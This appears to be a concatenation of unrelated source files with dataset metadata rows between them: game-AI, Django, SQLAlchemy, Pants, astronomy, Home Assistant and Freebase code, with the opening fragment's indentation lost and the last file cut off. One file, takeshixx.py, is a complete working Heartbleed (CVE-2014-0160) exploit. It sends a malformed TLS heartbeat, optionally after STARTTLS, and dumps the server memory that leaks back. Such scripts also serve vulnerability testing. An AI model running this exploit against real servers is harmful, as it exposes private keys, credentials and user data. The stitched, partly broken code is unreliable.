if os.stat("foo.csv").st_size != 0:
states = json.load(f)
f.close()
open('foo.csv', 'w').close()
f = open('foo.csv','rw+')
else:
states = {}
board = Board()
# attach it to a MinMax tree generator/evaluator, max depth 6:
mm = MinMax(6)
#sys.stdout.write("Who's first? (H)uman or (C)omputer? ")
#sys.stdout.flush()
#first = sys.stdin.readline().strip().lower()[0]
first = random.choice(['h','c'])
if first == 'h':
curplayer = Board.O # human
else:
curplayer = Board.X # computer
done = False
#sys.stdout.write("%s\n" % board)
while not done:
if board.full(): #DRAW
done = True
# print all_state
write_to_file()
#sys.stdout.write("Tie game!\n")
continue
if curplayer == Board.X:
#sys.stdout.write("Computer is thinking...\n")
# run the minmax tree for the current board
#if board.get_board_values() in states:
if board.get_board_values() in states and random.choice([True,True,False,True,False]):
move = states[board.get_board_values()]
else:
move = mm.buildtree(board, curplayer)
#sys.stdout.write("Computer's move: %s\n" % move)
else:
badMove = True
while badMove:
#sys.stdout.write("Enter a move: ");
sys.stdout.flush();
#move = int(sys.stdin.readline())
move = random.choice([0,1,2,3,4,5,6,7,8])
badMove = move < 0 or move > 8 or board[move] != Board.NONE
if move >= 0:
board.move(curplayer, move)
#sys.stdout.write("%s\n" % board)
winner = board.getWinner()
if winner == Board.X:
write_to_file()
# sys.stdout.write("X wins!\n")
done = True
elif winner == Board.O:
write_to_file()
# sys.stdout.write("O wins!\n")
done = True
# switch to other player:
if curplayer == Board.X:
curplayer = Board.O
else:
curplayer = Board.X
if __name__ == "__main__":
iterations = 5000
while iterations:
main()
iterations -= 1
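# Illustration (values are made up): after a few self-play games foo.csv holds
# a JSON dict mapping board strings from get_board_values() to the cached best
# move index, e.g.
#   {"---------": 4, "x---o----": 2}
# main() reloads this mapping on the next run so previously seen positions can
# skip the negamax search.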
| mit | 3,349,314,645,422,047,000 | 27.613924 | 98 | 0.496572 | false |
c3cashdesk/c6sh | src/tests/core/commands/test_import_member.py | 1 | 2412 | import tempfile
import pytest
from django.core.management import call_command
from postix.core.models import ListConstraint
@pytest.yield_fixture
def sample_member_file_ccc():
with tempfile.NamedTemporaryFile() as t:
t.write(
b"""chaos_number first_name last_name state
2 bezahlt
4 A B Verzug
5 C D bezahlt
8 E F bezahlt
11 G H ruhend
14 I J ruhend
23 K L bezahlt
"""
)
t.seek(0)
yield t.name
@pytest.yield_fixture
def sample_member_file_incremental_update_ccc():
with tempfile.NamedTemporaryFile() as t:
t.write(
b"""chaos_number first_name last_name state
2 bezahlt
4 A B Verzug
8 E Y bezahlt
11 G H ruhend
14 I J ruhend
23 K L ruhend
42 M N bezahlt
43 O P Verzug
"""
)
t.seek(0)
yield t.name
@pytest.mark.django_db
def test_member_import_ccc(sample_member_file_ccc):
call_command('import_member', sample_member_file_ccc)
lc = ListConstraint.objects.get(confidential=True, name='Mitglieder')
assert set((e.identifier, e.name) for e in lc.entries.all()) == {
('2', ' '),
('5', 'C D'),
('8', 'E F'),
('23', 'K L'),
}
@pytest.mark.django_db
def test_member_import_ccc_update(
sample_member_file_ccc, sample_member_file_incremental_update_ccc
):
call_command('import_member', sample_member_file_ccc)
lc = ListConstraint.objects.get(confidential=True, name='Mitglieder')
call_command('import_member', sample_member_file_incremental_update_ccc)
assert set((e.identifier, e.name) for e in lc.entries.all()) == {
('2', ' '),
(
'5',
'C D',
), # got removed from the file, but we don't detect that so we can apply partial lists as well
('8', 'E Y'), # name changed :)
('42', 'M N'),
}
@pytest.yield_fixture
def sample_member_file_local():
with tempfile.NamedTemporaryFile() as t:
t.write(
b"""CHAOSNR;NAME
1;foo
2;bar
"""
)
t.seek(0)
yield t.name
@pytest.mark.django_db
def test_member_import_local(sample_member_file_local):
call_command('import_member', sample_member_file_local, prefix='BLN')
lc = ListConstraint.objects.get(confidential=True, name='Mitglieder')
assert set((e.identifier, e.name) for e in lc.entries.all()) == {
('BLN-1', 'foo'),
('BLN-2', 'bar'),
}
| agpl-3.0 | 5,391,226,001,893,601,000 | 23.865979 | 103 | 0.612769 | false |
pyfidelity/rest-seed | backend/backrest/models/content.py | 1 | 1796 | from sqlalchemy import Column
from sqlalchemy import DateTime
from sqlalchemy import Integer
from sqlalchemy import String
from sqlalchemy import Unicode
from sqlalchemy import UnicodeText
from sqlalchemy.util import classproperty
from ..utils import utcnow
from .base import Base
def get_content(id):
""" Return content instance with the given id (or `None`). """
return Content.query.filter_by(id=id).first()
class Content(Base):
""" Base class for all content. Includes basic features such
as ownership, time stamps for modification and creation. """
@classproperty
def __mapper_args__(cls):
return dict(
polymorphic_on='type',
polymorphic_identity=cls.__name__.lower(),
with_polymorphic='*')
id = Column(Integer(), primary_key=True)
type = Column(String(30), nullable=False)
owner = Column(Unicode())
title = Column(Unicode())
description = Column(UnicodeText())
creation_date = Column(DateTime(timezone=True), nullable=False, default=utcnow)
modification_date = Column(DateTime(timezone=True), nullable=False, default=utcnow)
def __init__(self, **data):
self.add(**data)
def update(self, touch=True, **data):
""" Iterate over all columns and set values from data. """
super(Content, self).update(**data)
if touch and 'modification_date' not in data:
self.modification_date = utcnow()
def __json__(self, request):
return dict(id=self.id, title=self.title,
description=self.description,
creation_date=self.creation_date,
modification_date=self.modification_date)
def __eq__(self, other):
return isinstance(other, Content) and self.id == other.id
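# Minimal usage sketch (the `Page` subclass and the session handling are
# hypothetical, not part of this module):
#
#   class Page(Content):
#       pass
#
#   page = Page(title=u'Home', description=u'Landing page')
#   page.update(title=u'Start')  # touch=True also refreshes modification_date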
| bsd-2-clause | -3,919,537,068,281,949,700 | 32.886792 | 87 | 0.655902 | false |
tdyas/pants | src/python/pants/backend/python/lint/docformatter/rules.py | 1 | 5663 | # Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from dataclasses import dataclass
from typing import Tuple
from pants.backend.python.lint.docformatter.subsystem import Docformatter
from pants.backend.python.lint.python_fmt import PythonFmtFieldSets
from pants.backend.python.rules import download_pex_bin, pex
from pants.backend.python.rules.pex import (
Pex,
PexInterpreterConstraints,
PexRequest,
PexRequirements,
)
from pants.backend.python.subsystems import python_native_code, subprocess_environment
from pants.backend.python.subsystems.subprocess_environment import SubprocessEncodingEnvironment
from pants.backend.python.target_types import PythonSources
from pants.core.goals.fmt import FmtFieldSet, FmtFieldSets, FmtResult
from pants.core.goals.lint import LinterFieldSets, LintResult
from pants.core.util_rules import determine_source_files, strip_source_roots
from pants.core.util_rules.determine_source_files import (
AllSourceFilesRequest,
SourceFiles,
SpecifiedSourceFilesRequest,
)
from pants.engine.fs import Digest, MergeDigests
from pants.engine.process import FallibleProcessResult, Process, ProcessResult
from pants.engine.rules import SubsystemRule, named_rule, rule
from pants.engine.selectors import Get
from pants.engine.unions import UnionRule
from pants.python.python_setup import PythonSetup
from pants.util.strutil import pluralize
@dataclass(frozen=True)
class DocformatterFieldSet(FmtFieldSet):
required_fields = (PythonSources,)
sources: PythonSources
class DocformatterFieldSets(FmtFieldSets):
field_set_type = DocformatterFieldSet
@dataclass(frozen=True)
class SetupRequest:
field_sets: DocformatterFieldSets
check_only: bool
@dataclass(frozen=True)
class Setup:
process: Process
original_digest: Digest
def generate_args(
*, specified_source_files: SourceFiles, docformatter: Docformatter, check_only: bool,
) -> Tuple[str, ...]:
return (
"--check" if check_only else "--in-place",
*docformatter.options.args,
*sorted(specified_source_files.snapshot.files),
)
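# For illustration only (the extra flag is a hypothetical docformatter option):
# with check_only=False and two source files the tuple above would look like
#   ("--in-place", "--wrap-summaries=100", "src/a.py", "src/b.py")
# whereas the lint path passes "--check", so files are only reported, not edited.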
@rule
async def setup(
request: SetupRequest,
docformatter: Docformatter,
python_setup: PythonSetup,
subprocess_encoding_environment: SubprocessEncodingEnvironment,
) -> Setup:
requirements_pex = await Get[Pex](
PexRequest(
output_filename="docformatter.pex",
requirements=PexRequirements(docformatter.get_requirement_specs()),
interpreter_constraints=PexInterpreterConstraints(
docformatter.default_interpreter_constraints
),
entry_point=docformatter.get_entry_point(),
)
)
if request.field_sets.prior_formatter_result is None:
all_source_files = await Get[SourceFiles](
AllSourceFilesRequest(field_set.sources for field_set in request.field_sets)
)
all_source_files_snapshot = all_source_files.snapshot
else:
all_source_files_snapshot = request.field_sets.prior_formatter_result
specified_source_files = await Get[SourceFiles](
SpecifiedSourceFilesRequest(
(field_set.sources, field_set.origin) for field_set in request.field_sets
)
)
input_digest = await Get[Digest](
MergeDigests((all_source_files_snapshot.digest, requirements_pex.digest))
)
address_references = ", ".join(
sorted(field_set.address.reference() for field_set in request.field_sets)
)
process = requirements_pex.create_process(
python_setup=python_setup,
subprocess_encoding_environment=subprocess_encoding_environment,
pex_path="./docformatter.pex",
pex_args=generate_args(
specified_source_files=specified_source_files,
docformatter=docformatter,
check_only=request.check_only,
),
input_digest=input_digest,
output_files=all_source_files_snapshot.files,
description=(
f"Run Docformatter on {pluralize(len(request.field_sets), 'target')}: "
f"{address_references}."
),
)
return Setup(process, original_digest=all_source_files_snapshot.digest)
@named_rule(desc="Format Python docstrings with docformatter")
async def docformatter_fmt(
field_sets: DocformatterFieldSets, docformatter: Docformatter
) -> FmtResult:
if docformatter.options.skip:
return FmtResult.noop()
setup = await Get[Setup](SetupRequest(field_sets, check_only=False))
result = await Get[ProcessResult](Process, setup.process)
return FmtResult.from_process_result(result, original_digest=setup.original_digest)
@named_rule(desc="Lint Python docstrings with docformatter")
async def docformatter_lint(
field_sets: DocformatterFieldSets, docformatter: Docformatter
) -> LintResult:
if docformatter.options.skip:
return LintResult.noop()
setup = await Get[Setup](SetupRequest(field_sets, check_only=True))
result = await Get[FallibleProcessResult](Process, setup.process)
return LintResult.from_fallible_process_result(result)
def rules():
return [
setup,
docformatter_fmt,
docformatter_lint,
SubsystemRule(Docformatter),
UnionRule(PythonFmtFieldSets, DocformatterFieldSets),
UnionRule(LinterFieldSets, DocformatterFieldSets),
*download_pex_bin.rules(),
*determine_source_files.rules(),
*pex.rules(),
*python_native_code.rules(),
*strip_source_roots.rules(),
*subprocess_environment.rules(),
]
| apache-2.0 | -8,875,962,643,641,155,000 | 33.530488 | 96 | 0.719054 | false |
tayebzaidi/snova_analysis | Miscellaneous/supernova_readin_plot.py | 1 | 2998 | import matplotlib.pyplot as plt
import numpy as np
import peakfinding
import smoothing
import plotter
import readin
import sys
import os
if __name__== '__main__':
#lcurve = readin.readin_aavso('aavsodata_sscyg.txt')
#mjd = lcurve.jd - 240000.5
#mag = lcurve.magnitude
#maxtab, mintab = peakfinding.peakdet(mag,1.2 , mjd)
#smoothed = smoothing.UnivariateSplinefit(mjd, mag,5)
#maxtab, mintab = peakfinding.peakdet(smoothed, 1, mjd)
#data = readin.readin_SNANA('CFA4_2006ct.dat')
#plotter.plot1D(mjd, smoothed, 'blue', 0,1)
#plotter.plot1D(mjd, mag, 'red', 1,1)
#plotter.Show()
#data = readin.readin_SNrest()
#maxp, minp = peakfinding.peakdet(data.mag, 1, data.phase)
#interp = smoothing.Interpolate1D(data.phase, data.mag)
path = "/Users/zaidi/Documents/REU/restframe/"
Mvbdata = []
delM15data = []
err_data = []
for filename in os.listdir(path):
current_file = os.path.join(path, filename)
data= readin.readin_SNrest(filename)
try:
interp = smoothing.Interpolate1D(data.phase, data.mag)
maxp, minp = peakfinding.peakdet(data.mag, 0.55, data.phase)
Mvb = smoothing.MvB(data.mag, data.phase, minp)
delM15 = smoothing.delM15(interp, data.phase, minp)
if len(minp) != 0 and len(minp) < 3:
Mvbdata.append(Mvb)
delM15data.append(delM15)
err_data.append(data.err)
'''
fig = plt.figure(figsize=(6,6))
ax = fig.add_subplot(1,1,1)
ax.plot(data.phase, data.mag, 'k.', [minp[0][0]+15], interp(minp[0][0]+15), 'bo')
ax.axvline(minp[0][0])
ax.axvline(minp[0][0]+15)
ax.axhline(interp(minp[0][0]+15))
ax.axhline(minp[0][1])
plt.savefig(filename + '.png')
'''
except ValueError:
print filename, data
print data.mag, data.phase
print (len(data.mag), len(data.phase))
'''
print interp(15)
fig = plt.figure(figsize=(6,6))
ax = fig.add_subplot(1,1,1)
ax.plot(data.phase, data.mag, 'k.', [15.], interp(15), 'bo')
plt.ion()
plt.show(fig)
'''
#sys.exit(-1)
'''
ax = plotter.plot1D(data.phase, interp,'blue',1, lnstyle = '-')
try:
plotter.plot1DScatter(minp[:,0], minp[:,1], 'red', 1)
except IndexError:
pass
plotter.Show()
plotter.Clear()
a = raw_input("Press Enter to continue...")
if a == "q":
break
'''
fig2 = plt.figure(2)
ax = fig2.add_subplot(1,1,1)
ax.scatter(Mvbdata, delM15data,)
ax2 = fig2.add_subplot(3,2,1)
ax2.hist(err_data, 5)
plt.show(fig2)
#plt.plot(data.phase, data.mag, linestyle = ':')
#plt.gca().invert_yaxis()
#plt.show()
| gpl-3.0 | -1,806,584,690,072,135,200 | 32.685393 | 97 | 0.53936 | false |
badele/home-assistant | homeassistant/components/wink.py | 1 | 3001 | """
homeassistant.components.wink
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Connects to a Wink hub and loads relevant components to control its devices.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/wink/
"""
import logging
from homeassistant import bootstrap
from homeassistant.loader import get_component
from homeassistant.helpers import validate_config
from homeassistant.helpers.entity import ToggleEntity
from homeassistant.const import (
EVENT_PLATFORM_DISCOVERED, CONF_ACCESS_TOKEN,
ATTR_SERVICE, ATTR_DISCOVERED, ATTR_FRIENDLY_NAME)
DOMAIN = "wink"
DEPENDENCIES = []
REQUIREMENTS = ['https://github.com/balloob/python-wink/archive/'
'42fdcfa721b1bc583688e3592d8427f4c13ba6d9.zip'
'#python-wink==0.2']
DISCOVER_LIGHTS = "wink.lights"
DISCOVER_SWITCHES = "wink.switches"
DISCOVER_SENSORS = "wink.sensors"
DISCOVER_LOCKS = "wink.locks"
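# Example configuration.yaml entry (sketch; the token value is a placeholder):
#
#   wink:
#     access_token: YOUR_WINK_ACCESS_TOKEN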
def setup(hass, config):
""" Sets up the Wink component. """
logger = logging.getLogger(__name__)
if not validate_config(config, {DOMAIN: [CONF_ACCESS_TOKEN]}, logger):
return False
import pywink
pywink.set_bearer_token(config[DOMAIN][CONF_ACCESS_TOKEN])
# Load components for the devices in the Wink that we support
for component_name, func_exists, discovery_type in (
('light', pywink.get_bulbs, DISCOVER_LIGHTS),
('switch', pywink.get_switches, DISCOVER_SWITCHES),
('sensor', pywink.get_sensors, DISCOVER_SENSORS),
('lock', pywink.get_locks, DISCOVER_LOCKS)):
if func_exists():
component = get_component(component_name)
# Ensure component is loaded
bootstrap.setup_component(hass, component.DOMAIN, config)
# Fire discovery event
hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: discovery_type,
ATTR_DISCOVERED: {}
})
return True
class WinkToggleDevice(ToggleEntity):
    """ Represents a Wink toggle (switch) device. """
def __init__(self, wink):
self.wink = wink
@property
def unique_id(self):
""" Returns the id of this Wink switch. """
return "{}.{}".format(self.__class__, self.wink.deviceId())
@property
def name(self):
""" Returns the name of the light if any. """
return self.wink.name()
@property
def is_on(self):
""" True if light is on. """
return self.wink.state()
@property
def state_attributes(self):
""" Returns optional state attributes. """
return {
ATTR_FRIENDLY_NAME: self.wink.name()
}
def turn_on(self, **kwargs):
""" Turns the switch on. """
self.wink.setState(True)
def turn_off(self):
""" Turns the switch off. """
self.wink.setState(False)
def update(self):
""" Update state of the light. """
self.wink.updateState()
| mit | -1,104,886,890,720,861,200 | 28.712871 | 76 | 0.629124 | false |
lemoogle/iod-freebase-indexer | utils.py | 1 | 8062 | import json
import urllib
import requests
import itertools
import time
class FreebaseUtil(object):
freebase_topic_url="https://www.googleapis.com/freebase/v1/topic{}?filter=/common/topic/description&key={}"
service_url = 'https://www.googleapis.com/freebase/v1/mqlread'
aliases=[]
def __init__(self,freebase_key):
self.freebase_key=freebase_key
def runQuery(self,index,query,cursor="",category=False,description=False,):
count=100
if not cursor:
cursor = self.do_query(index,query,cursor=cursor,category=category,description=description)
while(cursor):
print cursor
count+=100
print count
open('cursor','wb').write(cursor)
cursor = self.do_query(index,query,cursor=cursor,category=category,description=description)
def do_query(self,index,query,cursor="",category=False,description=False):
params = {
'query': json.dumps(query),
'key': self.freebase_key
}
params['cursor']=cursor
url = self.service_url + '?' + urllib.urlencode(params)
response = requests.get(url).json()#json.loads(urllib2.urlopen(url).read())
for result in response['result']:
#print result['mid']
#print result
if description:
try:
freebase_url=self.freebase_topic_url.format(result["mid"],self.freebase_key)
content = requests.get(freebase_url).json()
content=content["property"]["/common/topic/description"]["values"][0]["value"]
result["content"]=content
except:
pass
#print result
#print content, freebase_topic_url.format(result["mid"],api_key)
else:
result["content"]=""
result["reference"] = result.pop("mid")
result["title"] = result.pop("name")
#characters= result["issues"];
#if characters:
# characters=map(lambda x: x.get('characters_on_cover',[]) ,characters )
# characters=reduce(lambda x, y: x+y, characters)
#result["featured_characters"]+=characters
#result.pop('issues')
result= self.flatten(result)
result= self.flattenlists(result)
if category:
result= self.standardize(result)
result=self.prepareCategory(result)
if result==0:
continue
#print result
if "authorname" in result:
result["category"]=result["authorname"]
index.pushDoc(result)
#print json.dumps(flatten(result),indent=4)
#print result["continues"]
try:
print "trying to index"
print index.commit(async=True).jobID
except:
print "indexing failed"
# try:
# print "trying to index"
# except:
# print "indexing failed"
return response.get("cursor")
def do_query_category(self,index,cursor=""):
self.params['cursor']=cursor
url = self.service_url + '?' + urllib.urlencode(self.params)
response = requests.get(url).json()#json.loads(urllib2.urlopen(url).read())
try:
a=response['result']
except:
print response
for result in response['result']:
#print result['mid']
#print result
if self.description:
try:
freebase_url=self.freebase_topic_url.format(result["mid"],self.params["key"])
content = requests.get(freebase_url).json()
content=content["property"]["/common/topic/description"]["values"][0]["value"]
result["content"]=content
except:
pass
#print result
#print content, freebase_topic_url.format(result["mid"],api_key)
else:
result["content"]=""
result["reference"] = result.pop("mid")
result["title"] = result.pop("name")
#characters= result["issues"];
#if characters:
# characters=map(lambda x: x.get('characters_on_cover',[]) ,characters )
# characters=reduce(lambda x, y: x+y, characters)
#result["featured_characters"]+=characters
#result.pop('issues')
result= self.flatten(result)
result= self.flattenlists(result)
result= self.standardize(result)
result=self.prepareCategory(result)
index.pushDoc(result)
#print json.dumps(flatten(result),indent=4)
#print result["continues"]
#print index.name
try:
print "trying to index"
print index.commit(async=True).jobID
except:
print "indexing failed"
return response.get("cursor")
def standardize(self,result):
#print result,"hello"
for k,v in result.iteritems():
splits = k.split("/")
#print len(splits)
if len(splits)>1:
result[splits[len(splits)-1]]=v
result.pop(k)
if 'key_namespace' in result:
result.pop('key_namespace')
result['wikipedia_url']="http://en.wikipedia.org/wiki/index.html?curid=%s" % result.pop("key_value")
return result
def prepareCategory(self,result):
phrase = result["title"]
if not phrase:
return 0
rest='("'+phrase+'") '
content=phrase+" "
#print result
for aliaskey in self.aliases:
for alias in result[aliaskey]:
content+=alias+" "
rest+=" OR (\"%s\") " % alias
if "," in phrase:
phrase =phrase.split(',')[0]
rest+="OR (\"%s\") " % phrase
if "Street" in phrase:
rest+=" OR (\"%s\") " % phrase.replace("Street","")
result['booleanrestriction']=rest
result['content']=content
return result
def flatten(self,obj, key=""):
key=key.split(":")[0]
if type(obj) is dict:
orig=dict(obj)
for k,v in obj.iteritems():
#print k,v
#key=key.split(":")[0]
#splits = key.split("/")
#print len(splits)
#key=splits[len(splits)-1]
newkey=""
if key:
newkey=key+"_"
newkey+=k
if type(v) is dict:
orig.update(self.flatten(v,newkey))
orig.pop(k)
elif type(v) is list:
flatlist=self.flatten(v,newkey);
if flatlist:
orig.update(flatlist)
orig.pop(k)
#print flatten(val,newkey)
#orig.update(flatten(v,newkey))
else:
if key:
orig[newkey]=v
orig.pop(k)
return orig
if type(obj) is list:
new={}
for a in obj:
if type(a) is dict:
#key=key.split(":")[0]
for k,v in self.flatten(a,key).iteritems():
#print new.get(k,[]).append(v)
#print k,v
if type(v) is list:
k=key+"_"+k
new[k]=new.get(k,[])
new[k].append(v)
if not new:
return False
return new
return obj
def flattenlists(self,obj):
for k,v in obj.iteritems():
if type(v) is list and len(v)>0 and not isinstance(v[0], basestring):
obj[k]=list(itertools.chain(*v))
return obj
| mit | 4,380,003,460,438,810,000 | 31.508065 | 111 | 0.499504 | false |
johnmarkschofield/heartbleed-weaponized | takeshixx.py | 1 | 4770 | #!/usr/bin/env python2
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS')
options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((args[0], opts.port))
if opts.starttls:
re = s.recv(4096)
if opts.debug: print re
s.send('ehlo starttlstest\n')
re = s.recv(1024)
if opts.debug: print re
if not 'STARTTLS' in re:
if opts.debug: print re
print 'STARTTLS not supported...'
sys.exit(0)
s.send('starttls\n')
re = s.recv(1024)
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(hello)
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(hb)
hit_hb(s)
if __name__ == '__main__':
main()
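# Invocation sketch (host names are placeholders): check the default HTTPS
# port, or an SMTP service via STARTTLS.
#
#   python takeshixx.py vulnerable.example.com
#   python takeshixx.py mail.example.com -p 25 -s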
| mit | -2,765,998,675,257,244,700 | 30.176471 | 122 | 0.57652 | false |
nakayamaqs/PythonModule | Learning/func_return.py | 1 | 1354 | # from :http://docs.python.org/3.3/faq/programming.html#what-is-the-difference-between-arguments-and-parameters
# By returning a tuple of the results:
def func2(a, b):
a = 'new-value' # a and b are local names
b = b + 1 # assigned to new objects
return a, b # return new values
x, y = 'old-value', 99
x, y = func2(x, y)
print(x, y) # output: new-value 100
# By passing a mutable (changeable in-place) object:
def func1(a):
a[0] = 'new-value' # 'a' references a mutable list
a[1] = a[1] + 1 # changes a shared object
args = ['old-value', 99]
func1(args)
print(args[0], args[1]) # output: new-value 100
# By passing in a dictionary that gets mutated:
def func3(args):
args['a'] = 'new-value' # args is a mutable dictionary
args['b'] = args['b'] + 1 # change it in-place
args = {'a':' old-value', 'b': 99}
func3(args)
print(args['a'], args['b'])
# Or bundle up values in a class instance:
class callByRef:
def __init__(self, **args):
for (key, value) in args.items():
setattr(self, key, value)
def func4(args):
args.a = 'new-value by func4.' # args is a mutable callByRef
args.b = args.b + 100 # change object in-place
args = callByRef(a='old-value', b=99,c=23)
func4(args)
print(args.a, args.b, args.c)
| mit | 7,679,583,819,250,892,000 | 28.434783 | 111 | 0.595273 | false |
googleapis/python-game-servers | samples/snippets/noxfile_config.py | 1 | 1607 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Default TEST_CONFIG_OVERRIDE for python repos.
# You can copy this file into your directory, then it will be inported from
# the noxfile.py.
# The source of truth:
# https://github.com/GoogleCloudPlatform/python-docs-samples/blob/master/noxfile_config.py
TEST_CONFIG_OVERRIDE = {
# You can opt out from the test for specific Python versions.
"ignored_versions": ["2.7"],
# Old samples are opted out of enforcing Python type hints
# All new samples should feature them
"enforce_type_hints": False,
# An envvar key for determining the project id to use. Change it
# to 'BUILD_SPECIFIC_GCLOUD_PROJECT' if you want to opt in using a
# build specific Cloud project. You can also use your own string
# to use your own Cloud project.
# "gcloud_project_env": "GOOGLE_CLOUD_PROJECT",
"gcloud_project_env": "BUILD_SPECIFIC_GCLOUD_PROJECT",
# A dictionary you want to inject into your test. Don't put any
# secrets here. These values will override predefined values.
"envs": {},
}
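# Example override (illustrative only; the variable name is hypothetical):
# secrets must not go here, but a non-secret variable needed by the samples
# could be injected like
#   "envs": {"CLOUD_GAME_SERVERS_LOCATION": "us-central1"},
# inside TEST_CONFIG_OVERRIDE above.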
| apache-2.0 | -1,290,368,420,881,174,500 | 41.289474 | 90 | 0.729932 | false |
disqus/django-old | tests/regressiontests/httpwrappers/tests.py | 1 | 12019 | import copy
import pickle
from django.http import (QueryDict, HttpResponse, SimpleCookie, BadHeaderError,
parse_cookie)
from django.utils import unittest
class QueryDictTests(unittest.TestCase):
def test_missing_key(self):
q = QueryDict('')
self.assertRaises(KeyError, q.__getitem__, 'foo')
def test_immutability(self):
q = QueryDict('')
self.assertRaises(AttributeError, q.__setitem__, 'something', 'bar')
self.assertRaises(AttributeError, q.setlist, 'foo', ['bar'])
self.assertRaises(AttributeError, q.appendlist, 'foo', ['bar'])
self.assertRaises(AttributeError, q.update, {'foo': 'bar'})
self.assertRaises(AttributeError, q.pop, 'foo')
self.assertRaises(AttributeError, q.popitem)
self.assertRaises(AttributeError, q.clear)
def test_immutable_get_with_default(self):
q = QueryDict('')
self.assertEqual(q.get('foo', 'default'), 'default')
def test_immutable_basic_operations(self):
q = QueryDict('')
self.assertEqual(q.getlist('foo'), [])
self.assertEqual(q.has_key('foo'), False)
self.assertEqual('foo' in q, False)
self.assertEqual(q.items(), [])
self.assertEqual(q.lists(), [])
self.assertEqual(q.items(), [])
self.assertEqual(q.keys(), [])
self.assertEqual(q.values(), [])
self.assertEqual(len(q), 0)
self.assertEqual(q.urlencode(), '')
def test_single_key_value(self):
"""Test QueryDict with one key/value pair"""
q = QueryDict('foo=bar')
self.assertEqual(q['foo'], 'bar')
self.assertRaises(KeyError, q.__getitem__, 'bar')
self.assertRaises(AttributeError, q.__setitem__, 'something', 'bar')
self.assertEqual(q.get('foo', 'default'), 'bar')
self.assertEqual(q.get('bar', 'default'), 'default')
self.assertEqual(q.getlist('foo'), ['bar'])
self.assertEqual(q.getlist('bar'), [])
self.assertRaises(AttributeError, q.setlist, 'foo', ['bar'])
self.assertRaises(AttributeError, q.appendlist, 'foo', ['bar'])
self.assertTrue(q.has_key('foo'))
self.assertTrue('foo' in q)
self.assertFalse(q.has_key('bar'))
self.assertFalse('bar' in q)
self.assertEqual(q.items(), [(u'foo', u'bar')])
self.assertEqual(q.lists(), [(u'foo', [u'bar'])])
self.assertEqual(q.keys(), ['foo'])
self.assertEqual(q.values(), ['bar'])
self.assertEqual(len(q), 1)
self.assertRaises(AttributeError, q.update, {'foo': 'bar'})
self.assertRaises(AttributeError, q.pop, 'foo')
self.assertRaises(AttributeError, q.popitem)
self.assertRaises(AttributeError, q.clear)
self.assertRaises(AttributeError, q.setdefault, 'foo', 'bar')
